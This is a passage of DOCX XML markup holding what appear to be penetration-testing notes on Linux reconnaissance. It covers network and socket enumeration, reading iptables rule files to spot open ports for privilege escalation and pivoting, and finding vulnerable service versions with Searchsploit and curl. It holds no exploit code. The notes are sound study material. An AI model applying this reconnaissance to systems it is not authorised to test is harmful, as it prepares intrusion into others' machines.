        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interface and IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A40">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">routel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="599"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A43">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="611"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -anp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">= All sockets, all protocols, all states (not just listening), with process info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="611"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Only listening TCP/UDP sockets, with process info — great for finding open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A46">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3cy07ruiij2o" w:id="366"/>
      <w:bookmarkEnd w:id="366"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Firewall enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In general, we're primarily interested in a firewall's state, profile, and rules during the remote exploitation phase of an assessment. However, this information can also be useful during privilege escalation. For example, if a network service is not remotely accessible because it is blocked by the firewall, it is generally accessible locally via the loopback interface. If we can interact with these services locally, we may be able to exploit them to escalate our privileges on the local system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During this phase, we can also gather information about inbound and outbound port filtering to facilitate port forwarding and tunneling when it's time to pivot to an internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A4F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Linux-based systems, we must have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges to list firewall rules with</w:t>
      </w:r>
      <w:hyperlink r:id="rId873">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId874">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">iptables</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, depending on how the firewall is configured, we may be able to glean information about the rules as a standard user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A50">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId875">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId876">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">iptables-persistent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> package on Debian Linux saves firewall rules in specific files under </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/iptables</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default. These files are used by the system to restore</w:t>
      </w:r>
      <w:hyperlink r:id="rId877">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId878">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">netfilter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rules at boot time. These files are often left with weak permissions, allowing them to be read by any local user on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A51">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also search for files created by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables-save</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, which is used to dump the firewall configuration to a file specified by the user. This file is then usually used as input for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables-restore</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and used to restore the firewall rules at boot time. If a system administrator had ever run this command, we could search the configuration directory (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) or grep the file system for iptables commands to locate the file. If the file has insecure permissions, we could use the contents to infer the firewall configuration rules running on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2425700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="125" name="image130.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image130.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87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2A54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/iptables/rules.v4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this file is read-only by any users other than root, we can inspect its contents. We'll notice a non-default rule that explicitly allows the destination port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1999</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This configuration detail stands out and should be noted for later investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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59">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iqaushfija2g" w:id="367"/>
      <w:bookmarkEnd w:id="367"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1265"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1265"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Exploit-DB and Rapid7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1265"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search on google with "CVE" or "Github"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A61">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v4shywumea6m" w:id="368"/>
      <w:bookmarkEnd w:id="368"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A62">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h6fk0d8e0ec6" w:id="369"/>
      <w:bookmarkEnd w:id="369"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Version of software on website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1322"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://[IP] | grep "version"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1322"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scroll through the output for red text that says "version"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1322"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or try another key word if that doesn't work, like the name of the application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A66">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1322"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/documentation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /README.md</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A6A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
